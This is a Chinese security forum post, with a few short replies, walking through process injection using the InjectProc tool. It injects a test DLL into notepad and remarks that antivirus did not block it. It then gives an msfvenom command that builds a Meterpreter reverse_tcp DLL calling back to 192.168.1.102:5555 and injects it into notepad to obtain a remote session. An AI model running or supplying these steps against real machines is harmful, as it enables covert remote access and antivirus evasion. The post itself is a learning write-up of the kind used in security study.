用户
搜索

该用户从未签到

安全团队

Rank: 7Rank: 7Rank: 7

25

主题

155

帖子

143

魔法币
收听
3
粉丝
17
注册时间
2016-8-17

i春秋认证春秋文阁

发表于 2017-6-12 21:27:38 43219
本帖最后由 Demon123 于 2017-6-12 21:30 编辑

1496580960878.png

InjectProc
流程注入是一种非常受欢迎的隐藏恶意代码的方法,被恶意软件作者广泛使用。
通常有这几种注入手段:DLL注入,过程替换(也称为工艺空心),钩注射和APC注射。
大多数使用相同的Windows API函数:OpenProcess,VirtualAllocEx,WriteProcessMemory,有关这些功能的详细信息,请使用MSDN。


DLL注入:
打开目标进程。
分配空间
将代码写入远程进程。
执行远程代码。
具体可以看看github内容介绍。

1496581431258.png

我看了大牛的视频自己学着模仿了一下

使用的InjectProc.exe在cmd运行:

1496581536842.png
这位大牛在视频中演示四个部分,我自己也尝试了模仿了其中的一段,觉得不错,我将自己经验分享给各位。

我使用的是—— InjectProc.exe dll_inj path/to/dll.dll notepad.exe

下载至桌面:https://github.com/secrary/InjectProc ,和下载InjectProc.exe 。


1496582442573.png



1496582390129.png



0x01

首先打开我们的cmd 进入 InjectProc 目录中,我们可以看到:

1496582636284.png

我们运行InjectProc.exe,并且使用dll_inj 参数,加上xxx.dll的路径 ,加上要注入的进程 InjectProc.exe dll_inj path/to/dll.dll notepad.exe。
在这里我们使用InjectProc\test_files目录中的,并且我们随机打开一个进程,如记事本进程。
使用以下命令:得到 mbox.exe—-InjectProc弹框。可以看到,杀软并未拦截!


1496583297150.png


0x02
这里让我联想到了前阵子NSA工具包,使用msf生成的dll得到会话。我们可以做下以下操作。
首先,我们使用msfVENOM生成dll:
[Shell] 纯文本查看 复制代码
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=5555 -f dll >demon.dll


1496583594241.png


其次,开启我们的msf监听:


1496583722323.png

接着,我们将生成好的dll丢到InjectProc目录中的随便一个文件中,比如我丢到InjectProc\test_files中:

1496584220484.png



使用以下命令,并打开记事本:
1496584076334.png

得到最终会话:


1496580960878-1.png


具体详细视频请看:http://www.ggsec.cn/InjectProc.html

                    扫一扫,关注我们!
                   090927qzvzuwtnnrcvwwlv.jpg                     
视频资料:https://www.youtube.com/watch?v=GT9nBuXatmU InjectProc | Process Injection Techniques | Malware
https://www.pinterest.com/penetrationtesting/
https://github.com/secrary/InjectProc github





评分

参与人数 1魔法币 +5 收起 理由
fcxx08 + 5 感谢你的分享,i春秋论坛有你更精彩!.

查看全部评分

发表于 2017-6-13 15:11:47
沙发
使用道具 举报 回复
板凳?
使用道具 举报 回复
顽皮梦宇 安全团队 星辰安全团队-忠于理想 面 i春秋认证
地板
发表于 2017-6-14 12:44:44
地板?
星辰安全团队-忠于理想 面对现实
论坛:bbs.hackla.cn
使用道具 举报 回复
发表于 2017-6-14 13:00:07
表哥厉害了...
使用道具 举报 回复
发新帖
您需要登录后才可以回帖 登录 | 立即注册